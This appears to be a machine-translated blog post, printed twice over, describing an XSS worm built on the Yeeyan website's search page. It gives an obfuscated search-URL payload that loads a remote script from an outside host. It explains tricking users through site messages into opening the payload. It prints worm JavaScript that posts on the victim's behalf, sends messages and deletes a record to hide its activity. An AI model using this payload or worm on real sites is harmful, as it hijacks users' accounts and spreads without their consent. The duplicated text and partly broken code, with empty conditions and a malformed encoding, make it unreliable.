Yiyan/ is a web2.0 website that "discovers, translates, and reads the essence of the Internet outside of Chinese". The filtering system is BT, but its search engine has cross-sites, and its search engine is also BT enough, which escapes single and double quotes, and does not return the search results when the search value contains an English colon: So I can only construct it like this:
/main/ysearch?q=%3Cs%63%72ipt%3Eeval(%53%%72om%43%68ar%43ode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,119,119,119,46,48,120,51,55,46,99,111,109,47,121,121,46,106,115,62,60,47,115,99,114,105,112,116,62,39,41))%3C/s%63%72ipt%3E
Originally, there is nothing fun about search engines across sites, but this time in yeeyan, we can use this easily overlooked point to create an XSS WORM. The following points must be solved for the birth of worms:
Q1. How does the above Search Engine XSS Trap contain remote worms?
A1. Because there are many worms, it is impossible to appear in this XSS Trap at once (compare: copy its own miniature XSS Worm), so we need to find a way to use this XSS Trap to call remote worms. There are many methods, you will know my method if you decode this XSS Trap :)
Q2. How to let other verification users access this Search Engine XSS Trap?
A2. First send a website message to some users (borrowing the worm itself can send it in batches :)) to deceive them into accessing. Once they access it, the XSS Trap will call the remote worm, and the worms will obtain their friend information and their mailbox information, etc. There are information from other users. So this Search Engine XSS Trap can be widely spread with the on-site information system.
Q2. How does worms obtain user logo information for accessing Search Engine XSS Trap?
A3. This is very important. The spread of worms requires many hosts. To obtain these hosts, you must be able to clearly obtain specific user logo information, such as his ID, his spatial address, etc. Once the worm spreads, it is explosive :).
I solved all these problems, so yeeyan's Search Engine XSS Worm was successfully born. The worm part code is as follows:
var _x=false;
if(){
_x=new XMLHttpRequest();
}else if(){
_x=new ActiveXObject("");
if(!_x){_x=new ActiveXObject("");}
}
_1();
function _1(){
var _u=_3or7("GET","/space/showme",null);
re=/\<a href=\"\/space\/groups\/(.*?)\">/i
r=_u.match(re);
src="/groups/newTopic/";
var _txt="HELLO YEEYAN.";
argv_1="\r\n";
argv_1+="---------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"data[Post][content]\"\r\n\r\n";
argv_1+=(_txt+"\r\n");
argv_1+="---------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"ymsggroup\"\r\n\r\n";
argv_1+=(""+"\r\n");
argv_1+="---------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"ymsgee\"\r\n\r\n";
argv_1+=(r[1]+"\r\n");
argv_1+="---------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"ymsgee_username\"\r\n\r\n";
argv_1+=(r[1]+"\r\n");
argv_1+="---------------------7964f8dddeb95fc5--\r\n";
_3or7("POST",src,argv_1);
var _del=_3or7("GET","/space/deleteEvent/15429",null);
//Delete the record just like this :)
_2();
}
function _2(){
src="/space/compose_message";
var _to="Yasmin";
var _s="yeeyan";
var _m="HELLO:)"
argv_1="\r\n";
argv_1+="---------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"data[receiver_name]\"\r\n\r\n";
argv_1+=(_to+"\r\n");
argv_1+="---------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"data[subject]\"\r\n\r\n";
argv_1+=(_s+"\r\n");
argv_1+="---------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"data[message][content]\"\r\n\r\n";
argv_1+=(_m+"\r\n");
argv_1+="---------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"data[message_id]\"\r\n\r\n";
argv_1+=(""+"\r\n");
argv_1+="---------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"data[action]\"\r\n\r\n";
argv_1+=("send"+"\r\n");
argv_1+="---------------------7964f8dddeb95fc5--\r\n";
_3or7("POST",src,argv_1);
alert(0);
}
function _3or7(_m,_s,_a){
_x.open(_m,_s,false);
if(_m=="POST")_x.setRequestHeader("Content-Type","multipart/form-data; boundary=-------------------7964f8dddeb95fc5");
_x.send(_a);
return _x.responseText;
}To understand these codes, please refer to my previous article, here is a clue: http:///post/. The purpose of my writing this worm is to verify the method mentioned in this article http:///post/. I can only say that the foreigner is a little irresponsible :), I also have to recode it. This method works theoretically, but I am currently in some trouble. It’s better to construct HTTP message headers. POST worm information is good. This is the first time I have done this to borrow search engines to create worms. As long as the XSS Trap and the target attack point are met, it will be OK.
/main/ysearch?q=%3Cs%63%72ipt%3Eeval(%53%%72om%43%68ar%43ode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,119,119,119,46,48,120,51,55,46,99,111,109,47,121,121,46,106,115,62,60,47,115,99,114,105,112,116,62,39,41))%3C/s%63%72ipt%3E
Originally, there is nothing fun about search engines across sites, but this time in yeeyan, we can use this easily overlooked point to create an XSS WORM. The following points must be solved for the birth of worms:
Q1. How does the above Search Engine XSS Trap contain remote worms?
A1. Because there are many worms, it is impossible to appear in this XSS Trap at once (compare: copy its own miniature XSS Worm), so we need to find a way to use this XSS Trap to call remote worms. There are many methods, you will know my method if you decode this XSS Trap :)
Q2. How to let other verification users access this Search Engine XSS Trap?
A2. First send a website message to some users (borrowing the worm itself can send it in batches :)) to deceive them into accessing. Once they access it, the XSS Trap will call the remote worm, and the worms will obtain their friend information and their mailbox information, etc. There are information from other users. So this Search Engine XSS Trap can be widely spread with the on-site information system.
Q2. How does worms obtain user logo information for accessing Search Engine XSS Trap?
A3. This is very important. The spread of worms requires many hosts. To obtain these hosts, you must be able to clearly obtain specific user logo information, such as his ID, his spatial address, etc. Once the worm spreads, it is explosive :).
I solved all these problems, so yeeyan's Search Engine XSS Worm was successfully born. The worm part code is as follows:
var _x=false;
if(){
_x=new XMLHttpRequest();
}else if(){
_x=new ActiveXObject("");
if(!_x){_x=new ActiveXObject("");}
}
_1();
function _1(){
var _u=_3or7("GET","/space/showme",null);
re=/\<a href=\"\/space\/groups\/(.*?)\">/i
r=_u.match(re);
src="/groups/newTopic/";
var _txt="HELLO YEEYAN.";
argv_1="\r\n";
argv_1+="---------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"data[Post][content]\"\r\n\r\n";
argv_1+=(_txt+"\r\n");
argv_1+="---------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"ymsggroup\"\r\n\r\n";
argv_1+=(""+"\r\n");
argv_1+="---------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"ymsgee\"\r\n\r\n";
argv_1+=(r[1]+"\r\n");
argv_1+="---------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"ymsgee_username\"\r\n\r\n";
argv_1+=(r[1]+"\r\n");
argv_1+="---------------------7964f8dddeb95fc5--\r\n";
_3or7("POST",src,argv_1);
var _del=_3or7("GET","/space/deleteEvent/15429",null);
//Delete the record just like this :)
_2();
}
function _2(){
src="/space/compose_message";
var _to="Yasmin";
var _s="yeeyan";
var _m="HELLO:)"
argv_1="\r\n";
argv_1+="---------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"data[receiver_name]\"\r\n\r\n";
argv_1+=(_to+"\r\n");
argv_1+="---------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"data[subject]\"\r\n\r\n";
argv_1+=(_s+"\r\n");
argv_1+="---------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"data[message][content]\"\r\n\r\n";
argv_1+=(_m+"\r\n");
argv_1+="---------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"data[message_id]\"\r\n\r\n";
argv_1+=(""+"\r\n");
argv_1+="---------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"data[action]\"\r\n\r\n";
argv_1+=("send"+"\r\n");
argv_1+="---------------------7964f8dddeb95fc5--\r\n";
_3or7("POST",src,argv_1);
alert(0);
}
function _3or7(_m,_s,_a){
_x.open(_m,_s,false);
if(_m=="POST")_x.setRequestHeader("Content-Type","multipart/form-data; boundary=-------------------7964f8dddeb95fc5");
_x.send(_a);
return _x.responseText;
}To understand these codes, please refer to my previous article, here is a clue: http:///post/. The purpose of my writing this worm is to verify the method mentioned in this article http:///post/. I can only say that the foreigner is a little irresponsible :), I also have to recode it. This method works theoretically, but I am currently in some trouble. It’s better to construct HTTP message headers. POST worm information is good. This is the first time I have done this to borrow search engines to create worms. As long as the XSS Trap and the target attack point are met, it will be OK.